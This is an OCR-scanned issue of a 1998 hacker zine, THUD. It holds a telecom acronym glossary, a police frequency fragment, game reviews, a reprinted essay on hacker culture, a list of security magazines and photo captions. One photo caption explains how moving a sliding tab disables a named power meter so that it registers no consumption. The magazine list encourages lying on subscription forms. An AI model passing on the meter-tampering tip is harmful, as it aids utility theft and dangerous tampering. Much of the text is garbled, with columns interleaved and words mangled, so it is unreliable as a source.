CAS7TAN CAS CCS7 message returned CCS Hundred (C) call seconds
CAS7TOT CAS CCS7 query which timed out before reply received CCS Hundred call seconds
CASOBOV CAS message received indicating data base overload CCSA Common control switching arrangement
CASOBOV Customer account services (CAS) message rece ived CCT Central control terminal
indicating data base overload CCT Initialize and update the contractor -transducer file
CASOBOV Customer account services (CAS) message rece ived CCTAC Computer communicat ions trouble analysis center
indicating database overload CCU Colt computer unit
CASOBUN CAS message returned CCU Combined channel units
CASGMSG CAS message received garbled CCU Commun ication control unit
CASNBLK CAS message returned because of network blockage CCV Calling card validation
CASNCON CAS message returned because of network congestion CD Call deflection (1.252e)
CASNRTE CAS message retumed because of no routing data CD Collision detection (->csmaJ)
CASTOUT CAS message retumed because of timeout COA Call data accumulator
CASUNEO CAS message returned because of unequipped COA Change distribution attributes
destination COA Coin detection and announcement
CASURPY CAS message received with an unexpected reply COACS Concentrating OACS
CAT Centrex access treatment COAR Customer dialed account record ing
CAT Craft access terminal CDC Central distrubtion center
CATLAS Centralized automatic trouble locating and analysis COCF Cumulative discounted cash flow
system COD Change due date
CAY Create an assembly COF Combined distributing frame
CB OCC audio facilitys INTERITRA bloca11-26 COF OTFcoin .
. CBA Change back acknowledgement (557: in mtp) COFI Communication link digital facilities interface
CBO Change back declaration (557 : in mtp) COl Circle digit identiflClltion
CBEMA Computer and business equipment manufacturers ' assc . COl Connected line identification (1.251C/E)
50 Volume 1 Issue 2 - Fall 1998 THUD
COl Control and data interface . Cit Call identity index
COl Control data interface Cit Initial address message (lAM) irregUlarity (incoming)
CDIG Circle digit translation (NTI) CIMAP Circuit installation and maintance assistance program
COM Coax data module CIMAP/CC Circuit installation and maintenance ass istance/control
COMA Code divisi on ma center
COO Community dial office CIP Control interface port
CDPR Customer dial pulse receiver CIRR CII rece ive register
COa l Custom calling services discount quote CIS Crimel ine informat ion systems
CDR Call detail record CIS Custom ized intercept service
CDR Call dial rerouting CIXR Clltransmit register
CDR Collision detect input line CJ OCC control facility INTERITRA blocal 1-26
CDR Cut thru dip report CK Checkbits
CDRR Call detail recording and reporting CK OCC overseas connecting facility wide-band INTERITRA
CDS Circuit design system bloca11 -26
CDS Codes CKF Continuity check failure (incoming)
CDS Craft dispatch system CKID Circuit identification
CE Collision elimination (->CSMAI) CKl Circuit location
CE Common equipment data (NTI) CKS Clock select bit
CE Conducted emission (EME) CKT Circuit
CE SSN station line INTERITRA bloca11-26 CKT Circuit.
CEF Cable entrance facility CKTRY Cuicuitry
CEI Comparable efficient interconnection Cl Centrex CO line INTERITRA bloca11-26
CEI Comparably efficient interconnection CLASS Centralized local area selective signaling
CEN European committee of standards CLASS Custom local area signaling service
CENEl EC European committee of standards (electrotechnics) ClC Common language code for an entity
CEP Connection endpoint ClCI Common language circuit identification
CEPT European conference of posUtelecom administrations ClCT Network management control counts
CES CC error summary ClDIR Call direction
CEU CCS estimated usage ClDN Calling line directory number
CEV Control environmental vault ClEI Common language equipment identifier
CEV Controlled environment vault ClF Creating dips upper bound load factor
CF Coin first ClFI Common lang facilities identication
CF OCC special facility INTERITRA blocal 1-26 CLI COSMOS processed alit reports
CFA Carrir failure alarms CLI Calling line ident
CFA Change facility attributes CLIO Calling line identification
CFC Cost function code CLIP Calling line identification presentat ion (i.251 c)
CFCA Communications fraud control association CLiR Calling line identification restriction (1.251d)
CFD Coinless ANI7 charge -a-call ClK Clock
CFGN Configuration cu, Creating dips lower bound load factor
CFI Configurable interface (SIPB) ClLl Common -language location identificat ion
CFINIT Custom calling feature table ClNK Commun ication link
CFN Call forward number ClNKs Commun ication links
CFND Call forward number don't answer ClNORM Commun ication link normalization
CFNR Call forwarding no reply (i.252 c) ClR Circu it layout record
CFP Call forwarding busy (i.252 b) ClR Clear
CFP Print the class of serv icelfeatures for an ClRC Circuit layout record card
electromechanical entity ClS ClCI in ser ial number format
CFR Code of federal regulations ClS Connectless-mode service
CFT Craft ClSD Closed
CFU Call forwarding unconditional (i.252 d) ClSV Class of service
CFU Change facility usage ClT ClCltelephone number format
CG Control group number ClT Communications line terminal
CG OCC telegraph facility INTERITRA blocal1 -26 ClUS Cluster data (NTI)
CGOl Carrier group in alarm - lAESS carrier group CM C-message frequency weighting
CG03 Reason for above - lAESS carrier group CM Commun ication module
CGA Carrier group alarm CM Connection memory
CGA Carrier group assignment CM OCC video facility INTERITRA blocal 1-26
CGAP Call gapping CMAC Centralized maintenance and administration center
CGAP Call gapping code controls messages . CMAP Centralized maintance and administration position
CGB Circuit group blocking (SS7 : in ISUP) CMC Call modifica tion completed (SS7: in ISUP) .
CGBA CGB acknowledgement CMC Cellular mobile carrier
CGM Compute r graphics metafile (ISO DIS 8632) CMC Cellular modile carrier
CGN Concentrator group number CMC Construction maintenance center
CGNC Conneclor group network controller CMD Command
CGU Circuit group unblocking (SS7: in ISUP) CMDF Combined main distributing frame
CGUA CGU acknowledgement CMOS Centralized message data system
CH Change CMF Capacity main station fill
CH OCC digital facility high-speed INTERITRA blocal 1-26 CMP Commun ication module processor
CHAN Channel CMP Communications module processor
CHAPS UNK - a known AT&T System - def. unknown CMP Companion board
CHAR Character CMP Corrective maintenancean practices
CHGLASG Change loop assignment CMPR Compares
CHK Check CMR Call modification request (SS7: in ISUP)
CHR Chronical CMR cellular mobile radio
CI Concentrator identifier trunk INTERITRA bloca11-26 CMRJ CMR reject (SS7 : in ISUP)
CIOIN Control interface 0 interrupt CMS Call management system
ClllN Control interface 1 interrupt CMS Circuit maintance system
CIB Centralized intercept bureau CMS Circuit maintance system lC
CIC Carrier identification codes CMS Circu it maintenance system
CIC Circuit identification code CMS Communications management subsystem
CIC Customer Information Center (AT&T) CMS Conversational monitoring system
CICS Customer information control system CMT cellular mobile telephone
CID Connection identification CMT Combined miscellaneous trunk frame
CIE Company establish company initiated change CMU CCS measured usage
CIF Common intermediate format (for ISDN high end video) CMU Colt measurement unit
CIH Craft Interface handler CN C-notch frequancy weighting
J'1/1J't'A'/IFTilTHI/IIMAGAl'/NF
~2IJ ILL, ~2" t'ANA"4 ~.1S;IIA'F/GN
~ a IIIK2S2t t'»'A'FJ'.s; t'APIJ6.1IJ
TH UD Volume 1 Issue 2 - Fall 1998 51
CN Change notice COSMOS Computer system for mainframe operations
CN Change I noticee COT Centeral office terminal
CN Connection COT Central office technician
CN SSN network trunk INTERITRA blocal1-26 COT Central office terminal
CN/A Customer name/address COT Central office terminal (opposite to RT)
CN02 . List of pay phones with coin disposal problems - 1AESS COT Continuity (SS7: in ISUP)
coin phone COTM Central office overload call timing (NTI)
CN03 Possible trouble - 1AESS coin phone CP Cable pair
CN04 Phone taken out of restored service because of possible CP Call processing parameters (NTI)
coin fraud CP Communication processor (SARTS)
CNA Communications network application CP Concentrator identifier signaling link INTERITRA blocal
CNAB Customer name/address bureau 1-26
CNCC Customer network control center CP Control program
CNI Common network interface CPA Centralizedlbulk power architecture
CNMS Cylink network management system CPC Cellular phone company
CNS Complimentary network service CPC Circuit provision center
CNS Concentrating network system CPC Circuit provisioning center
CNT Count CPC Circuit provisioning center (special services design group)
CNTS Counts CPCE Common peripheral controller equipment
CNVT Converted CPO Central pulse distributor
CO Central office CPO Common packet data channels
CO Continuous (SARTS) CPE Customer premise equipment
CO OCC overseas connecting facility INTERITRA blocal 1-26 CPE Customer premises equipment
CO UN Central office unit code CPG Call progress (SS7: in ISUP)
COA Change over acknowiedgement (SS7 in MTE) CPH Cost per hour
COAM Centralized operation CPI COSMOS-premis interface
COAM Customer owned and maintained CPI Computer private branch exchange interface
COC Circuit order control CPIE CP or AM intervention interrupt error
COCOT Customer-owned coin-operated telephone CPM COSMOS performance monitor
COO Code CPM Citcu it pack module
COOCF Central offICedata connecting facility CPM Cost per minute
COOEC Coder/decoder CPMP Carrier performance measurement plan
COE Central office entity CPS Cycles per second
COE Central office equipment CPU CCS capacity usage
COEES COE engineering system CPU Call pick up
COEES Central office equipment engineering system CPU Call pickup group
COER Central office equipment record CPU Central processing unit
COEST Central office equipment signature table COM Circuit group query (SS7 : in ISUP)
COF Confusion received (outgoing) COR COM response
COFA Change of frame alignment (OS-1) CR Carriage return
COG Centralized operations group CR Control Record
COGROG Central office grounding CR Control response
COLP Connected line identificat ion presentalion CR OCC backup facility INTERITRA blocal 1-26
COLR Connected line identification restriction CRAS Cable repa ir administrative system
COLT Central office limit table CRC Customer record center
COLT Central office line tester CRC Cyclic redundancy check
COM Common controller CRCOK CRC okl (CII channel code)
COM Communication CRE Create
COM Complement size CREO Credit card calling (i.256 a)
COM Computer output microfilm CREF Connection refused
COMJEXP PCM-compander/expander CREG Concentrated range extens ion with gain
COMM Comunication CRF Continuity recheck failure (outgoing)
COMMS Central office maintenance management system CRFMP Cable repair force management plan
COMMS-PM Central office maintenance management system- CRG Creg tag
preventive Maintenance CRIS Customer records information system
COMP Computed CROT Centralized automatic reporting of trunks (NTI)
COMPNY Company CRR Reset received (incoming)
COMPS Central Office Managenment Program (GTE) CRS Centralized results system
COMSAT Communications satellite CRSAB Centralized repair service answering bureau
CON Concentrator - COSMOS command CRST Specific carrier restricted
CONO Conditions CRT Cathode ray tube
CONF Conference call ing (i.254 a) CRT Cathode-ray tube
CONFIG Configutation CRTM Central office regular call processing timing (NTI)
CONN Connect msg . (i.451) CS Cable switching
CONN Connector CS Call Store
CONN Nailed-up connections CS Channel service INTERITRA blocal 1-26
CONT Control CS Conducted susceptibility (EMS)
CONTAC Central office network access CS Customer class of service
CONUS Continental united states CSA Carrier serving area
COO Change over order (SS7 : in MTP) CSACC Customer service administrat ion control center
COP Call offering procedure CSAR Centralized system for analys is and reporting
COPY Data copied from one address to another - 1AESS copy CSAR Centralized system for analys is report ing
CORC Commands and responses definition and compressing CSC Cell site controller
program (lOS) CSO Circuit specific data
CORC Customer riginated recent change CSOC Circuit switched digital capability
CORCs Customer-originated recent changes CSON Circuit-switched data network (1.70)
CORNET Corperate network CSF Critical short form
COS Connection-mode service CSMAI Carrier sense multiple access
COSIB Central office platform operator service interface board CSMCC Complex services maintenance control center
COSMIC Common systems main interconnection frame system CSNET Computer science network
(frame) CSO Central services organization
WRITE FOR THUD MAGAZINE
Would you like a free subscription?
WRITE SOMETHING FOR US!
THUD MAGAZINE ARTICLES, ·P. O. Box 2521, Cypress , CA 90630
.. :
CSO Cold start only (in eoc) CTO Call transfer outs ide
CS P Coin sent paid CTO Continuity timeout (incoming)
CSP Coin set paid CTP Print cable transfer frame wo rk
CSP ON Circuit -switched public data network CTR Cable throw replacement
CSR Clock shift register CTS Cable throw summary
CSR Customer service rec ords CTS Call through simulator
CSS Computer sub-system CTS Clear to send
CSS Computer subsystem CTSS Cray time sharing system
CSS Customer service system cn Cartridge tape transport
CSSC Cu stomer service system center cn Cut through tag
CST Call state or current state or change state (QUASI SOL) cnc Cartridge tape transport controller
CST Combined services term inal CnN Cable trunk ticke t number
CSU Channel service unit cnu Central trunk tes ting unit .
CSUS Centralized automatic message accounting suspension CTU Channel test unit
(NTI) CTW Withdraw a cab le transfer or a cable throw
CT Call transfer (i.252 a) CTX Cen trex group number
CT Control terminal CTX Var ious centrix ver ifies
CT SSN tie trunk INTERITRA blocal 1-26 CU Channel unit
CT01 Manually requested trace line to line information CU Channel un it
follows - 1AESS CU Control un it
CT02 Manually requested trace line to trunk information CU Customer unit
follows - 1AESS CU/EQ Common update/equipment system
CT03 Intraoffice call placed to a number with CLIO - 1AESS call CUITK Common update/trunking syst em
trace CUCRIT Capital utilization cr iteria
CT04 Interoffice call placed to a number with CLIO - 1AESS call CUG Closed use r group (i.255 a)
trace CUP Common upda te processor
C T05 Call placed to number on the ci list- 1AESS call trace CUS TAT Control unit hardware status
CT06 Contents of the Cllist - 1AESS call trace CUT Circu it under test
CT0 7 ACO related trace - 1AESS call trace CUTOVER Cutover (pre-cut) inactive state .
CTC Cen tral test center CV OCC voice grade facil ity INTERITRA blocal 1-26
CTC Centralized test center (DDS) CVN Vacant national number rece ived (outgo ing)
CTC Centraliz ed testing center CVR Compass vo ice response
CTC Complete a cable transfer or complete a cable throw CW Call waiting (i.253 a )
CTD Circu it test data CW OCC wire pair facility INTERITRA blocal 1-26
CTE Cable throw order establishment CWC City -w ide centrex
CT F Display the contacter-transducer file CWO Call waiting deluxe
cn Circu it termination identification CXC Complex service order input checker
CTL Cab le throw with line equipment ass ignment CXM Centre x tab le management
CTL Central operator control CXT Complex orde r inquiry for nac review
CTM Cable throw mod ification CZ OCC access facility INT ERIT RA blocal 1-26
CTM Conta c trunk module CorNet Corporate network protocol (ECMA and cCln q.9301931
CTMC Communications terminal modu le contro ller oriented )
CTM S Carr ier transm ission measuring system
massive frequency
list continued from
139.780
39 .800
IPolice mob ile
Police
139.860
39.880 ~~::~ 1~~:~~ I ~~::~:
page 4 9 ~~ :~~~ ~~::~IPUbliC Serv ice ~~:~~~ I Pol ice/Public Service
Police
39 .980 Po lice/Public Serv ice
MORE IN THE NEXT ISSUE III II
I) l~lll)I~INI~
IF YOU WANT TOGETANY OF THEFOLLOWINGINTO OUR NEXT
(FALL) ISSUEOF
"THEHACKERS UNDERGROUND DIGEST"
'LEASE SEND THE MATERIALTO US BEFORETHE DEADLINE.
WE'RE LOOKINGFOR:
IIA'/G/NA/ AA'TJYIIA'A'
JWIITIIGMlJWr II' 'III/A'MYIIA'//FHA~A'/NGA'FU/FD//FAlr
AA'T/~/FrliN ~A8/FlJf IF/FJWIIN £ PIIWF~ MID/It
F/F~hPIIN/~J;PA'II./F~~~IIA1PI//FA'J; FTt:
YOU NEEDTO HA VE MATERIAL SENT TO US BY
December 10th, 1998
(Volume 1, Issue 3 Winter 1998)
THUD Volume 1 Issue 2 - Fall 1998 53
varne
by: Cyber Punk
Title: Flying Saucer Sound: 5 of 10
Company: Software 2000/Post Linear What little sound there is doesn't grate on the nerves but I
think that the experience of actually being in an alien
Category: Flight Simulation
spacecraft, refurbished by us good ole' homosapiens or not,
Group: CLASS could have had a little more ambient sound thrown around to
Date: June 8th, 1998 help suspend disbelief a little longer.
Filenames: CLSFSR## [50 Disks]
Control: 3 of 10
Game Story God help the human being who decides they're going to fly
"Evil aliens bent on destroying Earth. A shadow government this thing or else. The total lack of comparison to any existing
agency cloning human-alien pilots. A stolen flying saucer from flight model on the face of the planet makes mastering this
Area 51. Now, you're the only person who can save the game an unlikely prospect at best and a trip into madness at
planet. What will you do?" worst. I realize that flying a UFO would probably be a whole
hell of a lot different than flying say a Cessna but in order to
Well, what you'll do is wonder who's harebrained idea it was make the game playable they should have ATLEAST
to design this game in the first place. Maybe the entire programmed the controls to be more like that of say a
X-Files hype is just starting to soak into everyone's psyche a helicopter or some other equally mobile aircraft. Realism, if
little bit too much because a game like this wouldn't have you can call controlling a UFO that, is fine and dandy but
even made it past the drawing board two or three years ago. sometimes sacrifices NEED to be made in order to sell
copies. It's all about money in the end folks and that means
Now, for years there has been one golden rule when it comes changing things around a little.
to flight sims of any kind and that has been, "keep it simple."
Yeah, I know, games these days are far more complex than Gameplay: x of 10
there forefathers were and it takes $500 worth of rudder I'm not going to rate the gameplay on this one. After an hour
pedals, flight sticks, and button covered throttles to control or two I was still unable to control the craft with any precision
everything but in the end it's all pretty basic. That is to say so I can't really speak on how well the game played one way
that if you pull back you'll go up, if you push right you'll bank or another.
right, etc. Not so in our good ole' flying saucer.
Overall: 5 of 10
You, as the pilot of this stolen craft, must not only figure out I just can't rate Flying Saucer much higher than this and still
how to fly with one hand and look around with the other but be able to sleep at night. The concept behind the game is
you must ALSO learn that front, back, left, right, and up and intriguing but it's not a big enough draw to make me accept
down have absolutely NO meaning whatsoever. Trying to the flight controls and the way they were implemented. I
complete the training missions in this game came damn near could be in the minority here. If I could ever find a way to
to giving me a nervous breakdown. master the game controls I might find this game to be a
worthy contender and a breath of fresh air in a market that's
Graphics: 7 of 10 saturated by copycats and franchise-whores. However, the
Nothing stunning here folks. Just the standard fair for a 3D designer's lack of ability to make the controls "other worldly"
accelerated game. The graphics do look a smidgen better if yet still easily learnable and usable knocks this one out of
you've got a Vood002 rather than a standard Voodoo but it's contention.
not enough to pull this one out of the mediocrity trap.
Title: Unreal
Company: Epic Megagames
Category: First Person Shooter
Group: N/A
Date: May 28th, 1998
Filenames: N/A
Game Story
You are a prisoner on the Vortex Rikers, the rankest prison
ship this side of the Milky Way and the furthest thing in the
universe from the freedom of your dreams. The ship has
crashed onto an unknown planet and your job, whether you
like it or not, is to find a way off of this rock with your life and
your hide intact.
Graphics: 10 of 10
Wow! Wow! Oh my GOD! WOW!
That was my first and is still my impression of the graphicstaken "detail" to the extreme. The graphical innovations are
engine in Unreal. The screenshots and descriptions are almost too numerous to list. Volumetric fog allows for area
useless because no matter how gorgeous you think it looks orspecific fog rather than the normal "world fog" that has been
seen to date . Distance cued light flaring that allows for lights
sounds it just doesn't do it justice until you actually walk, run.
and jump around and watch it all keep pace around you. to glow brighter depending not only on the environment but
also on their relative brightness and that affects your viewing
The little things mean a lot when it comes to the graphical ability. Detailed Texturing prevents "pixel blur" when the
splendor of a game and the folks at Epic Megagames have player gets up-close and personal with walls and creatures .
54 Volume 1 Issue 2 - Fall 1998 THUD
.....~I7"!:-;O SpaceOrb 360 work as long as you get the latest patch from
r-.... L."'~•••"'" both Epic and the manufacturer .
• Gameplay: 7 of 10
~ Again, it's an FPS so the gamepla,y, ~hile varied, is 'pretty
: much the same-old-same-old. Epic did do a good Job of
designing believable levels with beautiful architecture and , on
top of that, have added some very innovative single-player
I
features .
The addition of Bots, human imitating AI deathmatch
opponents , was a stroke of genius actually. It allows for a
.. single player to fight up to 10 (I think it's 10 but I might be
" wrong here) Bots in any of the deathmatch levels and it
greatly increases the playability of this title.
Unfortunately, like many other titles these days, the Internet
playability is atrocious . Now, Epic has promised a fix for this
and I see no reason to doubt their sincerity . However, it
True reflective surfaces allow for reflective marbled floors and would seem that since multiplayer can make or break an FPS
shimmering pools of water . title these days that they would have at least tried fixing this
little snafu before they shipped the final product.
Unlike most games in the FPS category , Unreal hasn't just
Imply improved on previous incarnations, it has raised the
p rformance bar to the next level.
Sound : 8 of 10
From the time you awake on the Vortex Rikers you're
surrounded by the sounds of your environment. The screams
of your wounded and dieing prison mates, the creak of
overstressed metal, and the low rumbling of machinery that is
going through the process of total failure are just astounding.
Even here detail seems to have been the name of the game .
Different materials make different sounds when you walk on
them. Environmental sounds , both indoor and outdoor, are
beautifully recorded and rendered .
Unreal even supports A3D and, let me tell you, with a 5.1
speaker setup the game literally obliterates the line between
reality and fantasy.
I've got two compla ints about the sound . One is that the Overall: 9 of 10
sound code is a little buggy and can cause some pretty Epic has done an excellent job here folks. The game is not
severe system lock-ups if you don't disable Direct3D sound only beautiful and cutting edge but it manages to immerse the
hardware in the Advanced Options menu and/or apply the player in a well-designed and very believable alien world.
Audio v2.02 patch. The second complaint is with the weapon
sounds. While well done they seem to be a little, how can I The FPS market is inundated with copycats and wannabes
put this, weak. They convey what they're supposed to but, yet Epic has managed to make Unreal a game that stands out
even with a serious sub-woofer setup , they just don't have the not only for it's technological achievements but for it's
hardcore BOOOOOM that you'd expect from some of the attent ion to every detail and nuance of the game world .
higher-powered weapons .
If you're only going to buy one FPS game these days then
Control: 10 of 10 Unreal is where you want to spend your hard earned dollars
Not much to say here . It's an FPS game and the controls are at this point. When Epic finally fixes their multiplayer
easily configured and work smoothly. There are no control problems and the few remaining bugs that are left Unreal is
bugs that I've been able to find and even controllers like the going to be a hard game for anyone to beat.
.rl'IltJI) ~ll~C.l~ZINI~
"Tl~Nrl'S YC)tJ!
DO YOU HAVE AN ARTICLE YOU'D LIKE TO SEE PRINTED IN THUD
MAGAZINE QUARTERLY JOURNAL? THEN YOU NEED TO SEND ACOpy TO:
Submissions
THUD Magazine, Inc.
P.O. Box 2521, Cypress CA, 90630
Ill~~II~~IIII~ll, 'I'III~ "Te)lll..l) IS (~e)(JN'I'INe; e)N
Y()lJ!
THUD Volume 1 Issue 2 · Fall 1998 55
IIA~kING ,.IIE IN"E~NE"
rr •• NIE BVIt,..
EDI'rED rr _i'lN
reprinted by permission from Iron Feather Journal
Try this multiple choice quiz. Using his home computer and a Information has always been power, but even more so these
modem, a teenage boy gains control of three telephone days ," says Logik , another long-time Internet hacker. If one
company central offices in Manhattan and all the phone can hold or release information , he can dictate how and when
switching centers in Los Angeles . he reprograms the home people think . Governments do this all the time, and hackers
phone of an enemy so that each time the phone is picked up, threaten this control. It's the National Security Agency's job to
a recording asks for 2 cents . He then reprograms the system know everything and keep the most important information
to mislead Federal agents trying to trace his call. The agents secret. It's the hackers job to make it public."
thinking they have found his hideout , barge in on another man
innocently watching television. Would you describe the teen Now with the growing acceptance of the Internet into the daily
as: lives of millions of people, the hacker community is also
becoming and important element on the Information
(A) a talented amateur user of computers Superhighway. Thanks to the Internet, many hackers are
using Usenet newsgroups such as alt.2600 and alt.hackers to
(B) one who enters computer systems without permission with meet, trade secrets , share phone numbers, and distribute
either malicious or non-malicious intent, to gain or alter crucial information on subjects such as how to trick parking
information meters to the basics of runnin PGP, a popular cryptography
software program .
(C) a brave rebel who stands up to those who control
communicat ions gateways and loudly preaches the credo "all "The Internet is a nirvana for hackers . It aloows great
information must be free" conve rsation and communication between people while
holding a wealth of information . Plus, it's an easy way to cover
(D) a techno-terrorist who only wants to gain power by one's tracks," Logik says. "The Internet provides a semi-safe
"cracking" passwords via his modem way to promote free information trade."
(E) all the above and much more Other hackers disagree about the reality of safe transmission
of information on the Internet. With the recent
If you answered "E" then you are definately more cyber sawy "communications Decency Act" (S 314) introduced in
than most people. All of the choices are different definitions of Congress by Senator James Exon (D-Nebraska) , not only will
the word "hacker." Even though the extent of hacker culture hackers have to fight for the right of privacy in cyberspace
began in the 1960's, the variety of definit ions still hold true communications, but the average Internet user will have to as
today. well. If passed , the proposed act would make anyone who
"makes , transmits, or otherwise makes available any
"The word 'hacker' is such a vague term nowadays because comment. request, suggestion , proposal , image, or other
there are the old school hackers and crackers who worked communication" that is "obscene , lewd, lascivious , filthy, or
from old Atari computers, the kids who broke into school indecent" using a "telecommunications device" a criminal
accounts from their campus library computer labs, and then under the law .
these newbie commercial provider hacks from America
Online (AOL) who think they can take over the Defense "Inernet users around the country will have to fight this bill and
Department with a s simple command," says Matrix, a veteran bills like it that are desinged to restrict the freedom on the
hacker and college graduate student studying at the Univerity Internet , subsequently taking away our First Amendment
of Colorado . "A hacker could be considered a martyr and a rights," says Stephen Orsinger , a hacker and social engineer
madman by two different people . PersonaII, I think hackers from San Antonio , TX.
have transcended their originial deiniion of someone who
merely tinkers with electronics to the cyberpunk who For some hackers privacy on the Internet is laughable. "What
promotes the decentralization of all information." is privacy?" asks Xenon , a freelance VB programmer and
hacker. "These are all 'Federal Interest Computers' when you
However , when most people think of the word "hacker" theu get down to it. The US Government gave birth to the Net.
don't think of a savior who distributes information the public Thos universities didn't pay for thei 180MHz, 500Meg RAM
has a right to know, but unstead a pincture of an angryu youth and 9gig hard disc space Sparc stations , the government
hunched over his computer waiting to sneak into a bank's funded them . Besides, traffic analysis is very revealing. If they
computer or government file with a stolen password or by know WHO you're talking to, WHAT you're saying , or not
finding a backdoor in a program . The media portrasys most saying , won't matter."
hackers to be like the hacker in the hit movie "War Games"
based on the notorious hacker, Kevin Mitnick , who broke into So with bills in Congress debating the future censoring of the
the Defense Departments computer system . Rarely does the Internet, and privacy being protected by PGP or violated by
hacker community have an opportunity to dispell the various government groups, what's a hacker to do? "There is
stereotypes the public and media create . Many hackers feel plenty of hacking to be done on the Internet," Zalchgar says.
as though they are used as scapegoats or lumped together as "But the Internet is not only used for hacking, it's original
a bunch of cyberspace criminals . purpose is still intact, to gather informat ion and redistribute .
Before one can hack the Internet , one needs to know how to
"Most hackers get a bad reputation due to the idiotic new find information in order for it to be useful."
hackers that think hacking is all about breaking into a system
and destroying/stealing information for personal tangible Some hackers , such as Matt Thomlinson, skip newsgroups
profit," says Zalchgar, a veteran Internet hacker. "A true and create reference home pages on the World Wide Web for
hacker may indeed break into a system and 'steal' veterns and newb ies to learn about cryptography adn
information , but the information is only used for personal ' computer coding . Thomlisnon's WWW Directory for
learning. A large part of hacking is not the break in or the Cypherpunks is one of the multitudes of home pages
'stealing', it's the learning of the system , its holes, and its (hyperlinked text, sound, and images) made exclusively for
uses." the hacking community. "I put together a directory of files I
had sucked off mailing lists over two years and put them up
"Hackers get a bad rep beacaus ethey are a threat to power. on a Web page," Thomlinson says. Thomlinson started the
56 Volume 1 Issue 2 - Fall 1998 THUD
home page because he says the Internet was changing at .cshrc question 600 times?" Many of the older hackers such
such a rate it was difficult to find quality information for as Thomlinson create home pages for newbies who have
hackers and cyberpunks to use. basic questions that seem to go unanswered on the
newsgroups.
"A few years ago the Internet was a geeky likke network
where you got as much talk about Unix and Perl as you do The hacker persona is as vast and complicated as the
'90210' and Ruch Limbaugh today. It was mostly made up of Internet itself. There are those hackers who want access and
educational institutions and was a nice academic resource - information to be free to the public. There are those whol
you could get questions answered, find people working on flame newbue hackers, and those who desire to learn more.
similar problems, or look information up," Thomlinson says. The hacker is more than just a kid snooping around private
Nowadays the Net is a place to hang out and gab about talk files. Ther use the Internet to share experiences and learn
shows. The talk about Unix still exists, but it's getting drown from each other. "On the Internet, there are a limited number
out by newbies who ask unresearched questions. This in turn of things to hack, but in no way do I see it as an over-hyped
cuts down on the number of expert programmers hanging wasteland," Orsinger says. "The day will never come when
around. Who wants to spend their time reading the same someone can't find somethingon the Internet to hack."
THE OTHER SIDE OF THEmEET
By Algernon
As most of us know , hacking zines are great ways to keep abreast on the latest trends and methods in the computer
und rground . Far too often, however, the hacker community neglects "legitimate" security magazines aimed at
y tem administrators. Not only is reading these magazines a great method to find out how system administrators are
combating your efforts, but you can also find little tidbits of information that you simply can't find anywhere else . Here's
a list of magazines related to computer security followed by a brief synopsis :
ICSA Information Security http://www.infosecuritymag.com Cost: Free Subscription Synopsis: While not always being
particularly informative, each issue proves interesting . They overestimate the hacker threat, but hey, they're trying to
sell a product. You can't beat the price.
SysAdm in http://www. samag. com Cost: $4.95 per issue
$39 for 1 year subscription
Synopsis: I like this magazine so much that I got a subscription to it. This maqaz lne consistently contains detailed and
useful information . I would advise anyone to pick up this magazine and read it.
Linux Journal http://www.linuxjournal.com Cost: $5 per issue
$22 for 1 year subscription Synopsis : Although this magazine generally is uninformative to the hacker, it is usually
interesting . It is a good magazine if you are running Linux and you want to stay current.
Sun Expert
http://www.netline.com/sunex
Cost: Free Subscription
Synopsis: I picked this up in a bookstore recently and I liked it. I am still waiting for my free subscription to arrive. It
seemed like a good magazine with some pretty detailed information.
UNIX Review 's Performance Computing
http://www. performancecomputing. cam
Cost: Free Subscription
Synopsis : This is an OK magazine that occasionally yields useful information. The price is right. Even if you never find
it useful , all you lose is a little mailbox space each month .
Secure Computing
http ://www .westcoast.com/securecomputing/securecomputing.html
Cost : Free Subscription in UK
Cost varies for other countries
Synopsis: I don't subscribe to this magazine because it is too expensive in the US.
Anyone in the UK can check it out for free.
HP Professional
http : //www .netline.com/hpp
Cost: Free Subscription
Synopsis: I haven't been able to find this magazine in any bookstores, but it seems like a good magazine from the
website . If it's not, you don't lose a cent for subscribing .
SCOWorid
http://www.scoworld.com
Cost: $22 for 1 year subscription
Synopsis : Although I occasionally find this interesting and useful , it doesn't justify the cost of the subscription . Some
people, however, really like this magazine .
That's it for this article . I hope that you find these magazines useful tools. Most of the free magazines are "for qualified
recipients" so bloat your subscription form (That's correct , I run a networking firm with revenues of one hundred million
pa year). SHARE THE INFORMATION!
THUD Volume 1 Issue 2· fall 1998 57
Hey, here's a few pies showing some stuph that's of interest to hackerz everywhere. The top left pic is a
telephone punch tool. It's used to push the telephone wires into the junction strips while simultaneously
cutting the excess wire for a clean look. The top right pic is some orange labelling tags that we are told are
used to label Southern California's Time Warner (formerly Paragon) customer cable connections.The
middle left pic is a that totally awesome 30 piece multi bit tool set we got from TCE Information Systems .
Check out their ad on page 33!! The middle right pic is one of those new remote control cutoff power boxes.
These boxes are replacing the old hand levers used to manually cut off power to a local area in an
emergency. The bottom two picks show the backside of the Duncan Rr81/3 KW HR Power Meter. Take note
of the change in position of the little horizontal sliding tab. This disables the power meter. The one on the
right with the tab NOT touching both pins is a disabled meter and will not register power consumption .
.----------------------------------.
I Back issues are $5 each ($6 Canada - $9 Foreign). Please allow 6-8 weeks
I supplies last.
for delivery of back issues. HURRY, while
•
I
I
I [ ] Volume 1, Issue 1 - First Quarter - Spring 1998 Quantity: I
I I
Please photocopy this page, fill out this Back Issue portion, indicating which issues you want and the quantity you desire. I
I Enclose with payment (check, money order, (ahem) cash or Credit Card Information - photocopy and include card with
I name/address and any other info you feel necessary. Send order to: I
I The Hackers Underground Digest - Back Issues. I
I P.O. Box 2521 I
I Cypress. CA 90630 I
._--------------------------------_.
58 Volume 1 Issue 2 - Fall 1998 THUD
Electronics & Computers Surplus City
COMPUTERS EIO is a versatile electronics surplus source
SURPLUS CITY associating information with the distribution
of electronics, computer and
optical materials. We have imp lem en ted
interactive via e-mail, technical forums on
Liquid Crystal Displays, Charge
Couple Dev ices, Stepper Motors, Las ers,
Laser Light Shows, Microcontrollers,
Holography, Fiber Optics, Electro-Optics
and ECSC Products with man y more forums
to come. We boldly supply li nks to
competitors, rev ealing alternate and
additional sources of surplus electronics,
along with providing a rich li s ti ng of
information on events (trade shows, swap
meets, conferences, etc .) and resources
such as web sites, magaz ines , newsgroups,
and in formati on of interest to the
technologically inclined.
LED's Softwa re ./ Netwo rk equipme nt
Wire ./ Hard drives ./ Monitors
Conn ectors ./ Surplus equipment ./ Printers
Compu ters ./ RAM ./ Hardware
Lasers ./ EPROMs ./ Mode ms
Racks ./ NOS (New Old Stock) ./ Sockets
Cases ./ Telephones ./ Tons of "obsolete" stuff!
